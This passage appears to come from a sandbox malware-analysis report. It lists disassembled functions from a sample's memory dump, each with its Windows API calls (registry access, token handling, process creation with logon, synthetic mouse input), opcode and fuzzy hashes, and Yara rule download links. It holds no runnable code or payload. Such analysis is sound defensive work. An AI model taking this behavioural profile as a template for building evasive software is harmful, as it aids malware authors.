                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                          • String ID: RoInitialize$combase.dll
                                                                                                          • API String ID: 3489934621-340411864
                                                                                                          • Opcode ID: 7e645799b61b2b2545488e7a8434e947048778fbf30fa36603df3ca4cdaae794
                                                                                                          • Instruction ID: c24871b8f56314f6514b7898a94aac479e19373f82bdefbe54705a980d17687c
                                                                                                          • Opcode Fuzzy Hash: 7e645799b61b2b2545488e7a8434e947048778fbf30fa36603df3ca4cdaae794
                                                                                                          • Instruction Fuzzy Hash: 36E0E570692705AFDA501B71FC4DB0937A5F711B0AF605425B441F51E0CBF544899E10
                                                                                                          Function 00E6428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E641A8), ref: 00E642A8
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00E642AF
                                                                                                          • EncodePointer.KERNEL32(00000000), ref: 00E642BA
                                                                                                          • DecodePointer.KERNEL32(00E641A8), ref: 00E642D5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                          • String ID: RoUninitialize$combase.dll
                                                                                                          • API String ID: 3489934621-2819208100
                                                                                                          • Opcode ID: 06aab2073eb99fe502a5adb6eee17fe57e90a10950cf3f579abaeae9d196041d
                                                                                                          • Instruction ID: 0e591a207ab003cc19036cd73dea00bf51dc769aaddfba58aa52dc6c541b6a31
                                                                                                          • Opcode Fuzzy Hash: 06aab2073eb99fe502a5adb6eee17fe57e90a10950cf3f579abaeae9d196041d
                                                                                                          • Instruction Fuzzy Hash: 63E0BDB0692B14AFEB519B61BD0DB463BA6FB08F46F68111AF001F51F0CBF54608EE10
                                                                                                          Function 00E4218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E421B8
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E421F9
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E42221
                                                                                                          • GetClientRect.USER32(?,?), ref: 00E42350
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E42369
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$Client$Window$Screen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1296646539-0
                                                                                                          • Opcode ID: 7bb6620c45e97d1c960341c9cf597ac8eebf82a0909911d7b8b2fc7fe985f447
                                                                                                          • Instruction ID: 30815fba496d36abd1e14a6e6585e247c85763ecb8be828d2cf91262a3df19a1
                                                                                                          • Opcode Fuzzy Hash: 7bb6620c45e97d1c960341c9cf597ac8eebf82a0909911d7b8b2fc7fe985f447
                                                                                                          • Instruction Fuzzy Hash: DAB17D3990024ADBDF10CFA8D8807EDB7B1FF08714F54A129EE59EB254DB70A950DB54
                                                                                                          Function 00EA6A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove$__itow__swprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253778849-0
                                                                                                          • Opcode ID: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                                                          • Instruction ID: 23a43816db18a5a024bf591fdb4a937180c9eebbf7c0085135d3f6aeca51d91b
                                                                                                          • Opcode Fuzzy Hash: c1d4d61aec3e97959054d52700e379228b0f43a147c246075d4bbaf544f73aac
                                                                                                          • Instruction Fuzzy Hash: 8761AD7160025AABCF12EF60D881FFE77E4AF0A348F086559F8557B192DB31AD45CB60
                                                                                                          Function 00EC0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E51A36: _memmove.LIBCMT ref: 00E51A77
                                                                                                            • Part of subcall function 00EC147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EC040D,?,?), ref: 00EC1491
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EC091D
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EC095D
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00EC0980
                                                                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00EC09A9
                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00EC09EC
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EC09F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 4046560759-0
                                                                                                          • Opcode ID: 928c9525969d363663a7c9101e7011f2f7d6d03a0abdf86eb82148d5c4d4d6cb
                                                                                                          • Instruction ID: 125fd1c8dbd85b7af9ecf091cf0256585349da8d380471c2d6b364e3ebfe9f17
                                                                                                          • Opcode Fuzzy Hash: 928c9525969d363663a7c9101e7011f2f7d6d03a0abdf86eb82148d5c4d4d6cb
                                                                                                          • Instruction Fuzzy Hash: 53516931208200EFD714EF64C985F6ABBE9FF85314F04591DF995A72A2DB32E909CB52
                                                                                                          Function 00E9F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E9F6A2
                                                                                                          • VariantClear.OLEAUT32(00000013), ref: 00E9F714
                                                                                                          • VariantClear.OLEAUT32(00000000), ref: 00E9F76F
                                                                                                          • _memmove.LIBCMT ref: 00E9F799
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E9F7E6
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E9F814
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1101466143-0
                                                                                                          • Opcode ID: d27103a97cb5f51971af0691a40ea291ef4d4ce2fa984cb22fdcf717af1c73cf
                                                                                                          • Instruction ID: a342e3d358545e8bbbe2559e767fb884b61f54cbf7fb615e73f06c028766cece
                                                                                                          • Opcode Fuzzy Hash: d27103a97cb5f51971af0691a40ea291ef4d4ce2fa984cb22fdcf717af1c73cf
                                                                                                          • Instruction Fuzzy Hash: 885148B5A00209EFCB14CF58D894AAAB7B8FF4C354F15856AE959EB310D730E911CFA0
                                                                                                          Function 00EA29B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 00EA29FF
                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EA2A4A
                                                                                                          • IsMenu.USER32(00000000), ref: 00EA2A6A
                                                                                                          • CreatePopupMenu.USER32 ref: 00EA2A9E
                                                                                                          • GetMenuItemCount.USER32(000000FF), ref: 00EA2AFC
                                                                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00EA2B2D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3311875123-0
                                                                                                          • Opcode ID: 3e072517580bb0298b1126dbea65239f7e20670a20378a8044dc8870f41eea2f
                                                                                                          • Instruction ID: 212af57cf713b831acd75f35af4a59ac53827b2726335acd144be844e951bee1
                                                                                                          • Opcode Fuzzy Hash: 3e072517580bb0298b1126dbea65239f7e20670a20378a8044dc8870f41eea2f
                                                                                                          • Instruction Fuzzy Hash: F6518E70A002099FDF25CF6CD888BAEBBF4AF4A318F14515DE911BF2A1D770A944CB61
                                                                                                          Function 00E41B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E429E2: GetWindowLongW.USER32(?,000000EB), ref: 00E429F3
                                                                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00E41B76
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E41BDA
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00E41BF7
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00E41C08
                                                                                                          • EndPaint.USER32(?,?), ref: 00E41C52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                          • String ID:
                                                                                                          • API String ID: 1827037458-0
                                                                                                          • Opcode ID: 876858cf001ea8ea392a7f014bb13f0abf33f36df127297398c67c413f00cd29
                                                                                                          • Instruction ID: 14e746f10ff5e407451dcb2abe6b7585772ce741097cd307abab76b4f69ad15b
                                                                                                          • Opcode Fuzzy Hash: 876858cf001ea8ea392a7f014bb13f0abf33f36df127297398c67c413f00cd29
                                                                                                          • Instruction Fuzzy Hash: 1441C370504304AFDB10DF25ECC8FAA7BE8FB45364F1445A9F9A9A72A1C730A845DB61
                                                                                                          Function 00EB7788 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,00EB550C,?,?,00000000,00000001), ref: 00EB7796
                                                                                                            • Part of subcall function 00EB406C: GetWindowRect.USER32(?,?), ref: 00EB407F
                                                                                                          • GetDesktopWindow.USER32 ref: 00EB77C0
                                                                                                          • GetWindowRect.USER32(00000000), ref: 00EB77C7
                                                                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00EB77F9
                                                                                                            • Part of subcall function 00EA57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EA5877
                                                                                                          • GetCursorPos.USER32(?), ref: 00EB7825
                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB7883
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 4137160315-0
                                                                                                          • Opcode ID: 965b29a0c889232286d9f2609f5fa14f6ec0fe01727c1c85b1f2e707a033d2b0
                                                                                                          • Instruction ID: 19895c1563672e946e400ca597a615e8d5e998b68c2a0e78ab9ee47de562063a
                                                                                                          • Opcode Fuzzy Hash: 965b29a0c889232286d9f2609f5fa14f6ec0fe01727c1c85b1f2e707a033d2b0
                                                                                                          • Instruction Fuzzy Hash: 6731A172509315AFD724DF54E849F9BB7EAFBC8314F00191AF595A7191CA30E908CB92
                                                                                                          Function 00E99431 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E98CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E98CDE
                                                                                                            • Part of subcall function 00E98CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E98CE8
                                                                                                            • Part of subcall function 00E98CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E98CF7
                                                                                                            • Part of subcall function 00E98CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E98CFE
                                                                                                            • Part of subcall function 00E98CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E98D14
                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00E9904D), ref: 00E99482
                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E9948E
                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00E99495
                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00E994AE
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00E9904D), ref: 00E994C2
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00E994C9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008561057-0
                                                                                                          • Opcode ID: 77f908ab56c182f2a977c9b86b98fe2d3c39e0b15ef0f3cbc8cdb9f9d5ded8a9
                                                                                                          • Instruction ID: 96bfe0362364d122b9d6b2787469769fb98e573055068c5805c7b77ed87ebe5f
                                                                                                          • Opcode Fuzzy Hash: 77f908ab56c182f2a977c9b86b98fe2d3c39e0b15ef0f3cbc8cdb9f9d5ded8a9
                                                                                                          • Instruction Fuzzy Hash: 1611DF31502204FFDF128FA9DC49BAE7BA9EB41316F14841DE851E3211C7369905CB60
                                                                                                          Function 00E991CF Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E99200
                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00E99207
                                                                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00E99216
                                                                                                          • CloseHandle.KERNEL32(00000004), ref: 00E99221
                                                                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E99250
                                                                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 00E99264
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                          • String ID:
                                                                                                          • API String ID: 1413079979-0
                                                                                                          • Opcode ID: fa3a20c4d76540e8261d446ece8ad807e29a2f9c2c3d844a9a0a553c2495ac98
                                                                                                          • Instruction ID: ae99f4d077fbce49d9d457c6f684d81ce9706c6fbc6c0bf7ce72d105fa59524f
                                                                                                          • Opcode Fuzzy Hash: fa3a20c4d76540e8261d446ece8ad807e29a2f9c2c3d844a9a0a553c2495ac98
                                                                                                          • Instruction Fuzzy Hash: 99114A7250220ABFDF018F99ED49BDE7BA9EB08308F08401AFA04B2161D2719D64DB60
                                                                                                          Function 00E9C329 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 00E9C34E
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00E9C35F
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E9C366
                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00E9C36E
                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00E9C385
                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00E9C397
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDevice$Release
                                                                                                          • String ID:
                                                                                                          • API String ID: 1035833867-0
                                                                                                          • Opcode ID: 98e02f3c6abce611755ae51a6e858a62f17d15ebfad7c0e17fbbaccbb1d81998
                                                                                                          • Instruction ID: 5bdf20cddfa18b7a377e09e4a6651ea4c46fc59506e69911848233e0650d0fab
                                                                                                          • Opcode Fuzzy Hash: 98e02f3c6abce611755ae51a6e858a62f17d15ebfad7c0e17fbbaccbb1d81998
                                                                                                          • Instruction Fuzzy Hash: 9C014475E01218BFEF109BA69D49B5EBFB8EB48751F1440A6FA04BB280D6709D14CFA0
                                                                                                          Function 00ECC552 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E416CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E41729
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41738
                                                                                                            • Part of subcall function 00E416CF: BeginPath.GDI32(?), ref: 00E4174F
                                                                                                            • Part of subcall function 00E416CF: SelectObject.GDI32(?,00000000), ref: 00E41778
                                                                                                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00ECC57C
                                                                                                          • LineTo.GDI32(00000000,00000003,?), ref: 00ECC590
                                                                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00ECC59E
                                                                                                          • LineTo.GDI32(00000000,00000000,?), ref: 00ECC5AE
                                                                                                          • EndPath.GDI32(00000000), ref: 00ECC5BE
                                                                                                          • StrokePath.GDI32(00000000), ref: 00ECC5CE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972927789.0000000000F00000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972956386.0000000000F09000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_10_2_e40000_Dump.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 43455801-0
                                                                                                          • Opcode ID: 9189e624a5e6267444b7cca4ba6ee1d5abf103c2e7bb774cba97ae8e3ad09645
                                                                                                          • Instruction ID: 4dc56bc222b27a9acfdbe81d52946c5932b7701c39734c220eb5c82b6a65b04c
                                                                                                          • Opcode Fuzzy Hash: 9189e624a5e6267444b7cca4ba6ee1d5abf103c2e7bb774cba97ae8e3ad09645
                                                                                                          • Instruction Fuzzy Hash: 49111E7240110DBFDF029F91EC48FDA7FADEB08354F048456F95866160D771AE59DBA0
                                                                                                          Function 00E607BB Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E607EC
                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00E607F4
                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E607FF
                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E6080A
                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 00E60812
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E6081A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000A.00000002.2972805202.0000000000E41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E40000, based on PE: true
                                                                                                          • Associated: 0000000A.00000002.2972781098.0000000000E40000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000ED0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                          • Associated: 0000000A.00000002.2972871924.0000000000EF6000.00000002.00000001.01000000.00000006.sdmpDownload File
